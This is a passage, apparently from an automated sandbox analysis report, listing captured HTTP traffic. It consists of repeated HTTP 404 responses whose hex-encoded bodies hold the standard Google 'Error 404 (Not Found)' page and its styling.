31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:54 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:55 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:08:58 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:09:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 